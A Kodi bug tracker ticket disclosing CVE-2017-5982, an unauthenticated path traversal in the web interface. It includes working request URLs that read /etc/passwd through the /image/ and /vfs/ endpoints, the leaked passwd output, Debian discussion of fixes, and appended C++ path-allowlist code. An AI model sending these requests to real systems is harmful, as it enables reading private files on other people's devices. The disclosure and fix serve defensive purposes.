#17314 new Bugs

Kodi 17.1 - Unrestricted file download

Reported by: 0xEF
Owned by: Montellese
Priority: 4 - Normal
Component: Web Server / Web Interface / Web API / JSON-RPC
Version: 17.1 "Krypton" RC1
Severity: Normal
Keywords: Security Bug
Cc:
Blocked By:
Blocking:
Platform: All

Description (last modified by 0xEF)

The web application loads a thumbnail of an image, video or plugin when selecting a category in the left menu with the following request:

http://192.168.1.25:8080/image/image%3A%2F%2F%252fhome%252fosmc%252f.kodi%252faddons%252fplugin.video.vice%252ficon.png%2F

Insufficient validation on user input is performed on this URL resulting in an unrestricted file download vulnerability. This enables attackers to retrieve arbitrary files from the filesystem by changing the location after the '/image/image%3A%2F%2F' part.

Example request:

http://192.168.1.25:8080/image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd

Response:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,:/run/systemd:/bin/false
messagebus:x:104:107::/var/run/dbus:/bin/false
avahi:x:105:108:Avahi mDNS daemon,:/var/run/avahi-daemon:/bin/false
ntp:x:106:110::/home/ntp:/bin/false
statd:x:107:65534::/var/lib/nfs:/bin/false
sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin
osmc:x:1000:1000::/home/osmc:/bin/bash

Change History (3)

comment:1 Changed at 2017-02-12T18:23:08Z by 0xEF

  • Description modified (diff)

comment:2 Changed at 2017-02-15T13:08:26Z by rbalint

This bug is also known as CVE-2017-5982.

http://seclists.org/fulldisclosure/2017/Feb/27

comment:3 Changed at 2017-04-26T20:30:28+01:00 by rbalint

Extra info from Debian BTS, https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=855225 :

2017-04-26 19:05 GMT+02:00 Antoine Beaupre <[email protected]…>:

affects 85225 xbmc
package xbmc
found 85225 2:11.0~git20120510.82388d5-1
thanks

I can confirm this affects both jessie-backports and wheezy. I've been able to access random files on my Kodi install using:

http://localhost:8080/image/image%3A%2F%2F%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fetc%252fpasswd

Just add more %2e%2e%252f in there if that's not deep enough for you. :)

In wheezy, it's even worse - there's a /vfs/ layer that gives you plain access to any given path, as bam discovered. But you don't even need any "special://" protocol, this just works:

http://localhost:8080/vfs/etc/passwd

Given that XBMC 11 (wheezy) and 16 (jessie-backports) are vulnerable, I would be very surprised if XBMC 13 had any reasonable protections in place.

As I explained in this post on debian-lts, I'm really unsure how to fix this issue:

https://lists.debian.org/[email protected]

Should we consider this part of the design that there's basically an open file manager in the Kodi web browser? That may sound ludicrous, but that's the way this thing is built right now. There's *some* password protection as well, although the password is empty by default and is therefore disabled. A possible workaround would be to force authentication, even if there are no passwords set. This would require commenting out this line:

m_needcredentials = !password.IsEmpty();

in CWebServer::SetCredentials (WebServer.cpp). That way attackers would be presented with an authentication dialog at least. There's a default username and password, but at this point we may somehow shift the blame to the user...

The alternative here is to start enforcing path restrictions on the requested files in the webserver. This is a difficult operation because, right now, files can be specified with arbitrary paths, including relative paths with ../ or absolute paths, and there aren't clear boundaries to where Kodi "can look": Kodi is designed to take over a media station and serve contents from all sorts of sources...

So if we change the webserver, we also need to change the callers, and that could prove more difficult...

A.
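The traversal in the ticket description and the /vfs/ path Antoine mentions come down to the same thing: the web server turns a client-supplied string into a filesystem path without checking where that path ends up. What follows is an added example, not Kodi's own code, of the path restriction he describes as the alternative fix. It recovers the filesystem path from an /image/ request (the URL-encoded image:// URL whose inner path is encoded a second time, hence the %252f in the ticket) or a /vfs/ request, normalizes it lexically, and accepts it only if it is one of, or strictly below, an allowlisted root. The request shapes follow the ticket's URLs; the function names, the kodi_example namespace and the allowed roots are assumptions for the example.

```cpp
// Added example (not Kodi's own code): a segment-boundary-aware containment check for
// the file paths carried by /image/ and /vfs/ web requests. Endpoint shapes follow the
// requests shown in the ticket; the allowed roots are assumptions for the example.
#include <cctype>
#include <iostream>
#include <string>
#include <vector>

namespace kodi_example {

// Decode one layer of %XX escapes; malformed escapes are copied through unchanged.
std::string PercentDecode(const std::string& in) {
  std::string out;
  for (size_t i = 0; i < in.size(); ++i) {
    if (in[i] == '%' && i + 2 < in.size() &&
        std::isxdigit(static_cast<unsigned char>(in[i + 1])) &&
        std::isxdigit(static_cast<unsigned char>(in[i + 2]))) {
      out += static_cast<char>(std::stoi(in.substr(i + 1, 2), nullptr, 16));
      i += 2;
    } else {
      out += in[i];
    }
  }
  return out;
}

// Recover the filesystem path a request asks for, or "" if the request is not one
// that serves files. /image/ carries a URL-encoded "image://<path>" whose inner path is
// encoded a second time, so it is decoded twice; /vfs/ carries the path directly.
std::string RequestToPath(const std::string& requestPath) {
  const std::string image = "/image/", vfs = "/vfs/", scheme = "image://";
  if (requestPath.compare(0, vfs.size(), vfs) == 0)
    return "/" + PercentDecode(requestPath.substr(vfs.size()));
  if (requestPath.compare(0, image.size(), image) != 0) return "";
  std::string url = PercentDecode(requestPath.substr(image.size()));  // first decode
  if (url.compare(0, scheme.size(), scheme) != 0) return "";
  std::string inner = url.substr(scheme.size());
  if (!inner.empty() && inner.back() == '/') inner.pop_back();       // trailing "/" as in the ticket's request
  return PercentDecode(inner);                                         // second decode
}

// Lexically normalize an absolute path (collapse "." and "..", drop empty segments).
// Relative paths and paths that climb above "/" are rejected by returning "".
std::string NormalizeAbsolute(const std::string& path) {
  if (path.empty() || path[0] != '/') return "";
  std::vector<std::string> parts;
  for (size_t start = 1; start <= path.size();) {
    size_t end = path.find('/', start);
    if (end == std::string::npos) end = path.size();
    const std::string seg = path.substr(start, end - start);
    if (seg == "..") {
      if (parts.empty()) return "";  // would escape above "/"
      parts.pop_back();
    } else if (!seg.empty() && seg != ".") {
      parts.push_back(seg);
    }
    start = end + 1;
  }
  std::string out;
  for (const auto& p : parts) out += "/" + p;
  return out.empty() ? "/" : out;
}

// True only if the normalized path is one of the roots or strictly below one of them.
// The '/' boundary check keeps "/home/osmc/.kodi/addons-other" from matching the
// root "/home/osmc/.kodi/addons".
bool IsAllowedPath(const std::string& requestPath, const std::vector<std::string>& roots) {
  const std::string normalized = NormalizeAbsolute(RequestToPath(requestPath));
  if (normalized.empty()) return false;
  for (const auto& root : roots) {
    const std::string r = NormalizeAbsolute(root);
    if (r.empty() || r == "/") continue;  // a "/" root would be a wildcard; refuse it
    if (normalized == r) return true;
    if (normalized.size() > r.size() && normalized.compare(0, r.size(), r) == 0 &&
        normalized[r.size()] == '/')
      return true;
  }
  return false;
}

}  // namespace kodi_example

int main() {
  // Roots are assumed for the example; a deployment would derive them from the
  // configured sources and the thumbnail cache.
  const std::vector<std::string> roots = {"/home/osmc/.kodi/addons",
                                          "/home/osmc/.kodi/userdata/Thumbnails"};
  const char* requests[] = {
      "/image/image%3A%2F%2F%252fhome%252fosmc%252f.kodi%252faddons%252fplugin.video.vice%252ficon.png%2F",
      "/image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd",
      "/vfs/etc/passwd"};
  for (const char* r : requests)
    std::cout << (kodi_example::IsAllowedPath(r, roots) ? "allow " : "deny  ") << r << '\n';
  return 0;
}
```

Two caveats apply to this shape of check. Lexical normalization does not resolve symlinks, so a deployment would still canonicalize the accepted path with realpath() (or the platform equivalent) before opening it and re-check containment on the result. And, as Antoine notes about the callers, the check only helps if it sits at the single point where a request string becomes a file open; a check in the web server that callers can bypass with their own path handling restores the original problem.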
